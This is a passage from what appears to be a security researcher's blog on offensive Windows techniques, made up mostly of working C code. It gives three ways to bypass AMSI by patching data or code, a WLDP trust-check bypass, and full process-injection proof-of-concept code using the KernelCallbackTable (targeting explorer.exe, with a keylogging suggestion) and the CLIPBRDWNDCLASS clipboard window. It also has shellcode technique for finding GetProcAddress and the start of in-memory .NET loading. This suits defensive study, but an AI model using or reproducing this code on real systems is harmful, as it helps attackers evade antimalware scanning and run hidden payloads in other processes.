    _HAMSICONTEXT *ctx = (_HAMSICONTEXT*)amsiContext;
    
    // validate arguments
    if(buffer           == NULL       ||
       length           == 0          ||
       amsiResult       == NULL       ||
       ctx              == NULL       ||
       ctx->Signature   != 0x49534D41 ||
       ctx->AppName     == NULL       ||
       ctx->Antimalware == NULL)
    {
      return E_INVALIDARG;
    }
    
    // scan buffer
    return ctx->Antimalware->Scan(
      ctx->Antimalware,     // rcx = this
      &CAmsiBufferStream,   // rdx = IAmsiBufferStream interface
      amsiResult,           // r8  = AMSI_RESULT
      NULL,                 // r9  = IAntimalwareProvider
      amsiContext,          // HAMSICONTEXT
      CAmsiBufferStream,
      buffer,
      length, 
      contentName,
      amsiSession);
}

Note how arguments are validated. This is one of the many ways AmsiScanBuffer can be forced to fail and return E_INVALIDARG.

7. CLR Implementation of AMSI

CLR uses a private function called AmsiScan to detect unwanted software passed via a Load method. Detection can result in termination of a .NET process, but not necessarily an unmanaged process using the CLR hosting interfaces. The following code gives you a rough idea of how CLR implements AMSI.

AmsiScanBuffer_t _AmsiScanBuffer;
AmsiInitialize_t _AmsiInitialize;
HAMSICONTEXT     *g_amsiContext;

VOID AmsiScan(PVOID buffer, ULONG length) {
    HMODULE          amsi;
    HAMSICONTEXT     *ctx;
    HAMSI_RESULT     amsiResult;
    HRESULT          hr;
    
    // if global context not initialized
    if(g_amsiContext == NULL) {
      // load AMSI.dll
      amsi = LoadLibraryEx(
        L"amsi.dll", 
        NULL, 
        LOAD_LIBRARY_SEARCH_SYSTEM32);
        
      if(amsi != NULL) {
        // resolve address of init function
        _AmsiInitialize = 
          (AmsiInitialize_t)GetProcAddress(amsi, "AmsiInitialize");
        
        // resolve address of scanning function
        _AmsiScanBuffer =
          (AmsiScanBuffer_t)GetProcAddress(amsi, "AmsiScanBuffer");
        
        // failed to resolve either? exit scan
        if(_AmsiInitialize == NULL ||
           _AmsiScanBuffer == NULL) return;
           
        hr = _AmsiInitialize(L"DotNet", &ctx);
        
        if(hr == S_OK) {
          // update global variable
          g_amsiContext = ctx;
        }
      }
    }
    if(g_amsiContext != NULL) {
      // scan buffer
      hr = _AmsiScanBuffer(
        g_amsiContext,
        buffer,
        length,
        0,
        0,        
        &amsiResult);
        
      if(hr == S_OK) {
        // if malware was detected or it's blocked by admin
        if(AmsiResultIsMalware(amsiResult) ||
           AmsiResultIsBlockedByAdmin(amsiResult))
        {
          // "Operation did not complete successfully because "
          // "the file contains a virus or potentially unwanted" 
          // software.
          GetHRMsg(ERROR_VIRUS_INFECTED, &error_string, 0);
          ThrowHR(COR_E_BADIMAGEFORMAT, &error_string);          
        }           
      }
    }
}

When AmsiScan is called for the first time, it invokes AmsiInitialize, and if successful will return a pointer to an AMSI context. The pointer is then saved to a global variable called g_amsiContext to be used for later scans. If buffer does contain harmful code, ThrowHR is called with COR_E_BADIMAGEFORMAT and ERROR_VIRUS_INFECTED as the secondary error. The problem with this code is that AmsiScanBuffer will return E_INVALIDARG if the AMSI context is corrupt and the fact AmsiScan doesn’t bother to investigate why.

8. AMSI Bypass A (Patching Data)

Matt Graeber provided a PoC that corrupts the context CLR!g_amsiContext points to, thus causing AmsiScanBuffer to return E_INVALIDARG. As you can see from the CLR implementation, this works because the result of CLR!AmsiScan is never validated for success or failure. The assumption is that it will simply throw an error and terminate the host application upon any attempt to load unwanted software. However, an unmanaged application hosting a .NET assembly is likely to handle any C++ exception. Windows Defender would still log the detection of harmful code, but the unmanaged host application would in some cases continue to run. To disable AMSI via g_amsiContext, one can either search through the heap memory pointed to by PEB.ProcessHeap or through each pointer found in the virtual address space of the .data segment. The following code demonstrates the latter approach. This only works _after_ CLR has called AmsiScan.

BOOL DisableAMSI(VOID) {
    LPVOID                   hCLR;
    BOOL                     disabled = FALSE;
    PIMAGE_DOS_HEADER        dos;
    PIMAGE_NT_HEADERS        nt;
    PIMAGE_SECTION_HEADER    sh;
    DWORD                    i, j, res;
    PBYTE                    ds;
    MEMORY_BASIC_INFORMATION mbi;
    _PHAMSICONTEXT           ctx;
    
    hCLR = GetModuleHandleA("CLR");
    
    if(hCLR != NULL) {
      dos = (PIMAGE_DOS_HEADER)hCLR;  
      nt  = RVA2VA(PIMAGE_NT_HEADERS, hCLR, dos->e_lfanew);  
      sh  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + 
             nt->FileHeader.SizeOfOptionalHeader);
             
      // scan all writeable segments while disabled == FALSE
      for(i = 0; 
          i < nt->FileHeader.NumberOfSections && !disabled; 
          i++) 
      {
        // if this section is writeable, assume it's data
        if (sh[i].Characteristics & IMAGE_SCN_MEM_WRITE) {
          // scan section for pointers to the heap
          ds = RVA2VA (PBYTE, hCLR, sh[i].VirtualAddress);
           
          for(j = 0; 
              j < sh[i].Misc.VirtualSize - sizeof(ULONG_PTR); 
              j += sizeof(ULONG_PTR)) 
          {
            // get pointer
            ULONG_PTR ptr = *(ULONG_PTR*)&ds[j];
            // query if the pointer
            res = VirtualQuery((LPVOID)ptr, &mbi, sizeof(mbi));
            if(res != sizeof(mbi)) continue;
            
            // if it's a pointer to heap or stack
            if ((mbi.State   == MEM_COMMIT    ) &&
                (mbi.Type    == MEM_PRIVATE   ) && 
                (mbi.Protect == PAGE_READWRITE))
            {
              ctx = (_PHAMSICONTEXT)ptr;
              // check if it contains the signature 
              if(ctx->Signature == 0x49534D41) {
                // corrupt it
                ctx->Signature++;
                disabled = TRUE;
                break;
              }
            }
          }
        }
      }
    }
    return disabled;
}

9. AMSI Bypass B (Patching Code 1)

CyberArk suggest patching AmsiScanBuffer with 2 instructions xor edi, edi, nop. If you wanted to hook the function, using a Length Disassembler Engine (LDE) might be helpful for calculating the correct number of prolog bytes to save before overwriting with a jump to alternate function. Since the AMSI context passed into this function is validated and one of the tests require the Signature to be “AMSI”, you might locate that immediate value and simply change it to something else. In the following example, we’re corrupting the signature in code rather than context/data as demonstrated by Matt Graeber.

BOOL DisableAMSI(VOID) {
    HMODULE        dll;
    PBYTE          cs;
    DWORD          i, op, t;
    BOOL           disabled = FALSE;
    _PHAMSICONTEXT ctx;
    
    // load AMSI library
    dll = LoadLibraryExA(
      "amsi", NULL, 
      LOAD_LIBRARY_SEARCH_SYSTEM32);
      
    if(dll == NULL) {
      return FALSE;
    }
    // resolve address of function to patch
    cs = (PBYTE)GetProcAddress(dll, "AmsiScanBuffer");
    
    // scan for signature
    for(i=0;;i++) {
      ctx = (_PHAMSICONTEXT)&cs[i];
      // is it "AMSI"?
      if(ctx->Signature == 0x49534D41) {
        // set page protection for write access
        VirtualProtect(cs, sizeof(ULONG_PTR), 
          PAGE_EXECUTE_READWRITE, &op);
          
        // change signature
        ctx->Signature++;
        
        // set page back to original protection
        VirtualProtect(cs, sizeof(ULONG_PTR), op, &t);
        disabled = TRUE;
        break;
      }
    }
    return disabled;
}

10. AMSI Bypass C (Patching Code 2)

Tal Liberman suggests overwriting the prolog bytes of AmsiScanBuffer to return 1. The following code also overwrites that function so that it returns AMSI_RESULT_CLEAN and S_OK for every buffer scanned by CLR.

// fake function that always returns S_OK and AMSI_RESULT_CLEAN
static HRESULT AmsiScanBufferStub(
  HAMSICONTEXT amsiContext,
  PVOID        buffer,
  ULONG        length,
  LPCWSTR      contentName,
  HAMSISESSION amsiSession,
  AMSI_RESULT  *result)
{
    *result = AMSI_RESULT_CLEAN;
    return S_OK;
}

static VOID AmsiScanBufferStubEnd(VOID) {}

BOOL DisableAMSI(VOID) {
    BOOL    disabled = FALSE;
    HMODULE amsi;
    DWORD   len, op, t;
    LPVOID  cs;
    
    // load amsi
    amsi = LoadLibrary("amsi");
    
    if(amsi != NULL) {
      // resolve address of function to patch
      cs = GetProcAddress(amsi, "AmsiScanBuffer");
      
      if(cs != NULL) {
        // calculate length of stub
        len = (ULONG_PTR)AmsiScanBufferStubEnd -
          (ULONG_PTR)AmsiScanBufferStub;
          
        // make the memory writeable
        if(VirtualProtect(
          cs, len, PAGE_EXECUTE_READWRITE, &op))
        {
          // over write with code stub
          memcpy(cs, &AmsiScanBufferStub, len);
          
          disabled = TRUE;
            
          // set back to original protection
          VirtualProtect(cs, len, op, &t);
        }
      }
    }
    return disabled;
}

After the patch is applied, we see unwanted software is flagged as safe.

11. WLDP Example in C

The following function demonstrates how to query the trust of dynamic code in-memory using Windows Lockdown Policy.

BOOL VerifyCodeTrust(const char *path) {
    WldpQueryDynamicCodeTrust_t _WldpQueryDynamicCodeTrust;
    HMODULE                     wldp;
    HANDLE                      file, map, mem;
    HRESULT                     hr = -1;
    DWORD                       low, high;
    
    // load wldp
    wldp = LoadLibrary("wldp");
    _WldpQueryDynamicCodeTrust = 
      (WldpQueryDynamicCodeTrust_t)
      GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
    
    // return FALSE on failure
    if(_WldpQueryDynamicCodeTrust == NULL) {
      printf("Unable to resolve address for WLDP.dll!WldpQueryDynamicCodeTrust.\n");
      return FALSE;
    }
    
    // open file reading
    file = CreateFile(
      path, GENERIC_READ, FILE_SHARE_READ,
      NULL, OPEN_EXISTING, 
      FILE_ATTRIBUTE_NORMAL, NULL); 
    
    if(file != INVALID_HANDLE_VALUE) {
      // get size
      low = GetFileSize(file, &high);
      if(low != 0) {
        // create mapping
        map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, 0);
        if(map != NULL) {
          // get pointer to memory
          mem = MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0);
          if(mem != NULL) {
            // verify signature
            hr = _WldpQueryDynamicCodeTrust(0, mem, low);              
            UnmapViewOfFile(mem);
          }
          CloseHandle(map);
        }
      }
      CloseHandle(file);
    }
    return hr == S_OK;
}

12. WLDP Bypass A (Patching Code 1)

Overwriting the function with a code stub that always returns S_OK.

// fake function that always returns S_OK
static HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
    HANDLE fileHandle,
    PVOID  baseImage,
    ULONG  ImageSize)
{
    return S_OK;
}

static VOID WldpQueryDynamicCodeTrustStubEnd(VOID) {}

static BOOL PatchWldp(VOID) {
    BOOL    patched = FALSE;
    HMODULE wldp;
    DWORD   len, op, t;
    LPVOID  cs;
    
    // load wldp
    wldp = LoadLibrary("wldp");
    
    if(wldp != NULL) {
      // resolve address of function to patch
      cs = GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
      
      if(cs != NULL) {
        // calculate length of stub
        len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
          (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
          
        // make the memory writeable
        if(VirtualProtect(
          cs, len, PAGE_EXECUTE_READWRITE, &op))
        {
          // over write with stub
          memcpy(cs, &WldpQueryDynamicCodeTrustStub, len);
        
          patched = TRUE;
        
          // set back to original protection
          VirtualProtect(cs, len, op, &t);
        }
      }
    }
    return patched;
}

Although the methods described here are easy to detect, they remain effective against the latest release of DotNet framework on Windows 10. So long as it’s possible to patch data or code used by AMSI to detect harmful code, the potential to bypass it will always exist.

Posted in assembly, programming, security, windows | Tagged , , , | 3 Comments

Windows Process Injection: KernelCallbackTable used by FinFisher / FinSpy

Introduction

The surveillance spyware FinFisher, also known as FinSpy, uses what Microsoft called an “interesting and quite unusual” method of process injection via the KernelCallBackTable. The method of injection has been used for 10+ years by the game hacking community to cheat and no doubt used for other nefarious purposes longer. My intention with this short post is not to encourage malicious activity using the KernelCallbackTable, but to make the reader aware of how it’s already being misused.

Process Environment Block

The KernelCallbackTable can be found in the PEB and is initialized to an array of functions when user32.dll is loaded into a GUI process.

typedef struct _PEB
{
    BOOLEAN InheritedAddressSpace;      // These four fields cannot change unless the
    BOOLEAN ReadImageFileExecOptions;   //
    BOOLEAN BeingDebugged;              //
    BOOLEAN SpareBool;                  //
    HANDLE Mutant;                      // INITIAL_PEB structure is also updated.

    PVOID ImageBaseAddress;
    PPEB_LDR_DATA Ldr;
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
    PVOID SubSystemData;
    PVOID ProcessHeap;
    PVOID FastPebLock;
    PVOID FastPebLockRoutine;
    PVOID FastPebUnlockRoutine;
    ULONG EnvironmentUpdateCount;
    PVOID KernelCallbackTable;
    // ...snipped

The functions are invoked to perform various operations usually in response to window messages. For example, _fnCOPYDATA is executed in response to the WM_COPYDATA message, so in the PoC, this function is replaced to demonstrate the injection. Finfisher uses the _fnDWORD function.

typedef struct _FNCOPYDATAMSG {
    CAPTUREBUF CaptureBuf;
    PWND pwnd;
    UINT msg;
    HWND hwndFrom;
    BOOL fDataPresent;
    COPYDATASTRUCT cds;
    ULONG_PTR xParam;
    PROC xpfnProc;
} FNCOPYDATAMSG;

DWORD _fnCOPYDATA(FNCOPYDATAMSG *pMsg);

Process Injection

We simply duplicate the existing table, set the fnCOPYDATA function to address of payload, update the PEB with address of new table and invoke using WM_COPYDATA. The following code demonstrates this.

VOID kernelcallbacktable(LPVOID payload, DWORD payloadSize) {
    HANDLE                    hp;
    HWND                      hw;
    DWORD                     id;
    LPVOID                    cs, ds;
    SIZE_T                    wr, rd;
    PROCESS_BASIC_INFORMATION pbi;
    PEB                       peb;
    KERNELCALLBACKTABLE       kct;
    COPYDATASTRUCT            cds;
    WCHAR                     msg[]=L"Injection via KernelCallbackTable";
    
    // 1. Find a window for explorer.exe
    //    Obtain the process id and open it
    hw = FindWindow(L"Shell_TrayWnd", NULL);
    GetWindowThreadProcessId(hw, &id);
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);

    // 2. Read the PEB and existing table address
    NtQueryInformationProcess(hp, 
      ProcessBasicInformation, &pbi, sizeof(pbi), NULL);
    
    ReadProcessMemory(hp, pbi.PebBaseAddress, 
      &peb, sizeof(peb), &rd);
      
    ReadProcessMemory(hp, peb.KernelCallbackTable,
      &kct, sizeof(kct), &rd);
    
    // 3. Write the payload to remote process
    cs = VirtualAllocEx(hp, NULL, payloadSize,
        MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    
    // 4. Write the new table to remote process
    ds = VirtualAllocEx(hp, NULL, sizeof(kct),
        MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    kct.__fnCOPYDATA = (ULONG_PTR)cs;
    WriteProcessMemory(hp, ds, &kct, sizeof(kct), &wr);
    
    // 5. Update the PEB
    WriteProcessMemory(hp, 
      (PBYTE)pbi.PebBaseAddress + offsetof(PEB, KernelCallbackTable),
      &ds, sizeof(ULONG_PTR), &wr);
    
    // 6. Trigger execution of payload
    cds.dwData = 1;
    cds.cbData = lstrlen(msg) * 2;
    cds.lpData = msg;
    
    SendMessage(hw, WM_COPYDATA, (WPARAM)hw, (LPARAM)&cds);
    
    // 7. Restore original KernelCallbackTable
    WriteProcessMemory(hp,
      (PBYTE)pbi.PebBaseAddress + offsetof(PEB, KernelCallbackTable),
      &peb.KernelCallbackTable, sizeof(ULONG_PTR), &wr);
      
    // 8. Release memory for code and data, close process
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);
    CloseHandle(hp);
}

Key logging

Key up and down events are processed by the ClientImmProcessKey function. Simply replacing the pointer to a custom routine would allow event-based key logging for the process. This avoids using SetWindowsHookEx that is viewed with suspicion. The prototype of this function is:

DWORD ClientImmProcessKey(
    IN HWND hWnd,
    IN HKL  hkl,
    IN UINT uVKey,
    IN LPARAM lParam,
    IN DWORD dwHotKeyID);

Anti-Hooking

DLL injection can be performed using SetWindowsHookEx. This post suggests how to prevent it by hooking the ClientLoadLibrary function.

HANDLE ClientLoadLibrary(
    IN PUNICODE_STRING pstrLib,
    IN BOOL bWx86KnownDll);

Summary

There are many possible ways to misuse this table. Detection of hooking might involve verifying the address of each function can be found inside user32.dll code. Source for PoC can be found here.

Posted in assembly, injection, malware, programming, windows | Tagged , , | Leave a comment

Windows Process Injection: CLIPBRDWNDCLASS

Introduction

The Object Linking & Embedding (OLE) library (ole32.dll) uses a private clipboard. It registers CLIPBRDWNDCLASS as a window class, creates a window derived from that class, and assigns a number of window properties to store the address of interfaces required to process clipboard data. Hexacorn describes here how one of the properties, ClipboardDataObjectInterface, can be leveraged for code injection. Two other properties, ClipboardRootDataObjectInterface and ClipboardDataObjectInterfaceMTA can also be used. If ClipboardDataObjectInterface is set to the address of an IUnknown interface and the clipboard window procedure receives a WM_DESTROYCLIPBOARD message, it will invoke the Release method.

Finding Windows

Private clipboards registered by OLE32.dll can’t be found by EnumWindows because they’re message-only windows. FindWindowEx with HWND_MESSAGE will find them and is used for the PoC. Another approach requires reading the ReservedForOle value of each Thread Environment Block in a process. ReservedForOle points to a SOleTlsData structure that contains a window handle for CLIPBRDWNDCLASS. To find private clipboards via the TEB, open a process and enumerate threads. Then perform the following steps:

  • Open the thread
  • Query the ThreadBasicInformation
  • Read tbi.TebBaseAddress
  • Read sizeof(SOleTlsData) from teb.ReservedForOle
  • Read hwndClip

Interface

Since only the Release method is called by the Window procedure that retrieves a pointer to the interface, the following structure is enough.

// fake interface
typedef struct _IUnknown_t {
    // a pointer to virtual function table
    ULONG_PTR lpVtbl;
    // the virtual function table
    ULONG_PTR QueryInterface;
    ULONG_PTR AddRef;
    ULONG_PTR Release;       // executed for WM_DESTROYCLIPBOARD
} IUnknown_t;

Injection

The following code assumes a valid clipboard window already exists. There is no error checking.

VOID clipboard(LPVOID payload, DWORD payloadSize) {
    HANDLE     hp;
    HWND       hw;
    DWORD      id;
    IUnknown_t iu;
    LPVOID     cs, ds;
    SIZE_T     wr;
    
    // 1. Find a private clipboard.
    //    Obtain the process id and open it
    hw = FindWindowEx(HWND_MESSAGE, NULL, L"CLIPBRDWNDCLASS", NULL);
    GetWindowThreadProcessId(hw, &id);
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);

    // 2. Allocate RWX memory in process and write payload
    cs = VirtualAllocEx(hp, NULL, payloadSize,
        MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    
    // 3. Allocate RW memory in process.
    //    Initialize and write IUnknown interface
    ds = VirtualAllocEx(hp, NULL, sizeof(IUnknown_t),
        MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    iu.lpVtbl  = (ULONG_PTR)ds + sizeof(ULONG_PTR);
    iu.Release = (ULONG_PTR)cs;
    WriteProcessMemory(hp, ds, &iu, sizeof(IUnknown_t), &wr);
    
    // 4. Set the interface property and trigger execution
    SetProp(hw, L"ClipboardDataObjectInterface", ds);
    PostMessage(hw, WM_DESTROYCLIPBOARD, 0, 0);
    
    // 5. Release memory for code and data
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);
    CloseHandle(hp);
}

Summary

This method is very similar to the PROPagate technique because it uses the SetProp API. However, this is easier to exploit because the window procedure removes the window property after receiving WM_DESTROYCLIPBOARD. PoC here.

Posted in malware, programming, security, shellcode, windows | Tagged , , , | Leave a comment

Shellcode: Using the Exception Directory to find GetProcAddress

Introduction

Let’s say you want the location of the GetProcAddress API in memory, but you can’t use the Import Address Table (IAT) or the Export Address Table (EAT). What other ways can you do it?. Perhaps there are many ways, but let me suggest one that’s relatively simple to implement and only involves searching for immediate values in the code section. When GetProcAddress or GetProcAddressForCaller cannot locate the address of a function in a dynamic library, they will return the error code STATUS_ORDINAL_NOT_FOUND. If we search in kernelbase.dll for this immediate value, we should land somewhere in the address range of these API. From there, we locate the entry point.

Method 1 (32-bit)

Search the code section (.text) of each Dynamic-link Library (DLL) for the immediate value 0xC0000138. If we find it, reverse the direction of search until we find the prolog bytes. For stdcall convention, prolog bytes normally begin with push ebp and mov ebp, esp. If the prolog contains mov edi, edi we can safely skip that because it’s only used for hot-patching systems after XP SP2. The following pseudo-code attempts to describe this idea.

  func GetGPA
    set addr = 0
    
    foreach (DLL in PEB) and addr is 0
      for pos = start(DLL.text) to end(DLL.text) - 4
        if pos[0] equal to STATUS_ORDINAL_NOT_FOUND
          while (pos[0] not equal to prolog (push ebp, mov ebp, esp)) 
            set pos = pos - 1
          set addr = pos
          break
        end if
        set pos = pos + 1
      end for
    end for
    
    set GetGPA = addr
  end func

The following code in C demonstrates the idea.

LPVOID GetGPA(VOID) {
    PPEB                  peb;
    PPEB_LDR_DATA         ldr;
    PLDR_DATA_TABLE_ENTRY dte;
    LPVOID                addr=NULL;
    BYTE                  c;
    PIMAGE_DOS_HEADER     dos;
    PIMAGE_NT_HEADERS     nt; 
    PIMAGE_SECTION_HEADER sh;
    DWORD                 i, j, h;
    PBYTE                 cs;
    
    peb = (PPEB) __readfsdword(0x30);
    ldr = (PPEB_LDR_DATA)peb->Ldr;
    
    // for each DLL loaded
    for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
         dte->DllBase != NULL && addr == NULL; 
         dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
    { 
      // is this kernel32.dll or kernelbase.dll?
      for (h=i=0; i<dte->BaseDllName.Length/2; i++) {
        c = dte->BaseDllName.Buffer[i];
        h += (c | 0x20);
        h = ROTR32(h, 13);
      }
      if (h != 0x22901A8D) continue;
      
      dos = (PIMAGE_DOS_HEADER)dte->DllBase;  
      nt  = RVA2VA(PIMAGE_NT_HEADERS, dte->DllBase, dos->e_lfanew);  
      sh  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + 
             nt->FileHeader.SizeOfOptionalHeader); 
             
      for (i=0; i<nt->FileHeader.NumberOfSections && addr == NULL; i++) {
        if (sh[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) {
          cs = RVA2VA (PBYTE, dte->DllBase, sh[i].VirtualAddress);
          for(j=0; j<sh[i].Misc.VirtualSize - 4 && addr == NULL; j++) {
            // is this STATUS_ORDINAL_NOT_FOUND?
            if(*(DWORD*)&cs[j] == 0xC0000138) {
              while(--j) {
                // is this the prolog?
                if(cs[j  ] == 0x55 &&
                   cs[j+1] == 0x8B &&
                   cs[j+2] == 0xEC) {
                  addr = &cs[j];
                  break;
                }
              }
            }
          }
        }
      }
    }
    return addr;
}

This approach should work fine on 32-bit legacy systems, but not 64-bit systems.

Method 2 (64-bit)

The first method doesn’t work for x64 builds because of compiler optimizations and different calling convention. stdcall is replaced with Microsoft fastcall, and chunking can break up a function over a wider address range. For 64-bit, both problems can be solved parsing the Exception Directory (.pdata section), which is an array of IMAGE_RUNTIME_FUNCTION_ENTRY structures. When an exception occurs, the dispatcher will enumerate this array until it finds the primary function associated with the address of exception, and will use the unwind information to try fix up the stack. You can find more information about x64 exception handling here.

typedef struct _IMAGE_RUNTIME_FUNCTION_ENTRY {
    ULONG BeginAddress;
    ULONG EndAddress;
    ULONG UnwindInfoAddress;
} _IMAGE_RUNTIME_FUNCTION_ENTRY, *_PIMAGE_RUNTIME_FUNCTION_ENTRY;

The following pseudo-code attempts to describe the idea..

  func GetGPA
    set addr = 0
    
    foreach (DLL in PEB) and addr is 0
      foreach runtime in DLL.DataDirectory[Exception] and addr is 0
        set baddr = runtime.BeginAddress
        set start = runtime.BeginAddress + DLL.DllBase
        set end   = runtime.EndAddress   + DLL.DllBase
        for start to end and addr is 0
          if start[0] == near conditional jump
            set rva = (*(DWORD*)(start + 2) + 6 + start) - DLL.DllBase
            foreach runtime in DLL.DataDirectory[Exception] and addr is 0
              if rva == runtime.BeginAddress
                set start2 = runtime.BeginAddress + DLL.DllBase
                set end2   = runtime.EndAddress   + DLL.DllBase
                for start2 to end2
                  if start2[0] == STATUS_ORDINAL_NOT_FOUND
                    addr = baddr + DLL.DllBase
                    break
                  end if
                end for
              end if
            end foreach
          end if
        end for
      end foreach
    end foreach
    
    set GetGPA = addr
  end func

The following code has been tested on 64-bit builds of Windows 7 and Windows 10. GetGPA returned the address of GetProcAddress in both tests.

LPVOID GetGPA(VOID) {
    PPEB                          peb;
    PPEB_LDR_DATA                 ldr;
    PLDR_DATA_TABLE_ENTRY         dte;
    LPVOID                        addr=NULL;
    BYTE                          c;
    PIMAGE_DOS_HEADER             dos;
    PIMAGE_NT_HEADERS             nt;
    PIMAGE_DATA_DIRECTORY         dir;
    PIMAGE_RUNTIME_FUNCTION_ENTRY rf;
    DWORD                         i, j, h, rva, ba;
    PBYTE                         s1, e1, s2, e2;
    PUNWIND_INFO                  ui;
    
    peb = (PPEB) __readgsqword(0x60);
    ldr = (PPEB_LDR_DATA)peb->Ldr;
    
    for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
         dte->DllBase != NULL && addr == NULL; 
         dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
    { 
      // is this kernelbase.dll?
      for (h=0, i=0; i<dte->BaseDllName.Length/2; i++) {
        c = (BYTE)dte->BaseDllName.Buffer[i];
        h += (c | 0x20);
        h = ROTR32(h, 13);
      }
      // if not, skip it
      if (h != 0x22901A8D) continue;
      
      dos = (PIMAGE_DOS_HEADER)dte->DllBase;  
      nt  = RVA2VA(PIMAGE_NT_HEADERS, dte->DllBase, dos->e_lfanew);  
      dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
      rva = dir[IMAGE_DIRECTORY_ENTRY_EXCEPTION].VirtualAddress;
      rf  = (PIMAGE_RUNTIME_FUNCTION_ENTRY) RVA2VA(ULONG_PTR, dte->DllBase, rva);
      
      // foreach runtime function and address not found
      for(i=0; rf[i].BeginAddress != 0 && addr == NULL; i++) {
        ba = rf[i].BeginAddress;
        // we will search the code between BeginAddress and EndAddress
        s1 = (PBYTE)RVA2VA(ULONG_PTR, dte->DllBase, rf[i].BeginAddress);
        e1 = (PBYTE)RVA2VA(ULONG_PTR, dte->DllBase, rf[i].EndAddress);
        
        // if chained unwind information is specified in the next entry
        ui = (PUNWIND_INFO)RVA2VA(ULONG_PTR, dte->DllBase, rf[i+1].UnwindData);
        
        if(ui->Flags & UNW_FLAG_CHAININFO) {
          // find the last entry in the chain
          for(;;) {
            i++;
            e1 = (PBYTE)RVA2VA(ULONG_PTR, dte->DllBase, rf[i].EndAddress);
            ui = (PUNWIND_INFO)RVA2VA(ULONG_PTR, dte->DllBase, rf[i].UnwindData);
            if(!(ui->Flags & UNW_FLAG_CHAININFO)) break;
          }
        }
        // for this address range minus the length of a near conditional jump
        while(s1 < (e1 - 6)) {
          // is the next instruction a near conditional jump?
          if(s1[0] == 0x0F && s1[1] >= 0x80 && s1[1] <= 0x8F) {
            // calculate the relative virtual address of jump
            rva = (DWORD)(((*(DWORD*)(s1 + 2)) + 6 + s1) - (PBYTE)dte->DllBase);
            // try find the rva in exception list
            for(j=0; rf[j].BeginAddress != 0 && addr == NULL; j++) {
              if(rf[j].BeginAddress == rva) {               
                s2 = (PBYTE)RVA2VA(ULONG_PTR, dte->DllBase, rf[j].BeginAddress);
                e2 = (PBYTE)RVA2VA(ULONG_PTR, dte->DllBase, rf[j].EndAddress);
                // try find the error code in this address range
                while(s2 < (e2 - 4)) {
                  // if this is STATUS_ORDINAL_NOT_FOUND
                  if(*(DWORD*)s2 == 0xC0000138) {
                    // calculate the virtual address of primary function
                    addr = (PBYTE)RVA2VA(ULONG_PTR, dte->DllBase, ba);
                    break;
                  }
                  s2++;
                }
              }
            }
          }
          s1++;
        }
      }
    }
    return addr;
}

Sources here.

Posted in assembly, programming, security, shellcode, windows | Tagged , , , , , | 3 Comments

Shellcode: Loading .NET Assemblies From Memory

Introduction

The dot net Framework can be found on almost every device running Microsoft Windows. It is popular among professionals involved in both attacking (Red Team) and defending (Blue Team) a Windows-based device. In 2015, the Antimalware Scan Interface (AMSI) was integrated with various Windows components used to execute scripts (VBScript, JScript, PowerShell). Around the same time, enhanced logging or Script Block Logging was added to PowerShell that allows capturing the full contents of scripts being executed, thereby defeating any obfuscation used. To remain ahead of blue teams, red teams had to go another layer deeper into the dot net framework by using assemblies. Typically written in C#, assemblies provide red teams with all the functionality of PowerShell, but with the distinct advantage of loading and executing entirely from memory. In this post, I will briefly discuss a tool called Donut, that when given a .NET assembly, class name, method, and optional parameters, will generate a position-independent code (PIC) or shellcode that can load a .NET assembly from memory. The project was a collaborative effort between myself and TheWover who has blogged about donut here.

Common Language Runtime (CLR) Hosting Interfaces

The CLR is the virtual machine component while the ICorRuntimeHost interface available since v1.0 of the framework (released in 2002) facilitates hosting .NET assemblies. This interface was superseded by ICLRRuntimeHost when v2.0 of the framework was released in 2006, and this was superseded by ICLRMetaHost when v4.0 of the framework was released in 2009. Although deprecated, ICorRuntimeHost currently provides the easiest way to load assemblies from memory. There are a variety of ways to instantiate this interface, but the most popular appears to be through one of the following:

CorBindToRuntime and CorBindToRuntimeEx functions perform the same operation, but the CorBindToRuntimeEx function allows us to specify the behavior of the CLR. CLRCreateInstance avoids having to initialize Component Object Model (COM) but is not implemented prior to v4.0 of the framework. The following code in C++ demonstrates running a dot net assembly from memory.

#include <windows.h>
#include <oleauto.h>
#include <mscoree.h>
#include <comdef.h>

#include <cstdio>
#include <cstdint>
#include <cstring>
#include <cstdlib>
#include <sys/stat.h>

#import "mscorlib.tlb" raw_interfaces_only

void rundotnet(void *code, size_t len) {
    HRESULT                  hr;
    ICorRuntimeHost          *icrh;
    IUnknownPtr              iu;
    mscorlib::_AppDomainPtr  ad;
    mscorlib::_AssemblyPtr   as;
    mscorlib::_MethodInfoPtr mi;
    VARIANT                  v1, v2;
    SAFEARRAY                *sa;
    SAFEARRAYBOUND           sab;
    
    printf("CoCreateInstance(ICorRuntimeHost).\n");
    hr = CoInitializeEx(NULL, COINIT_MULTITHREADED);
    
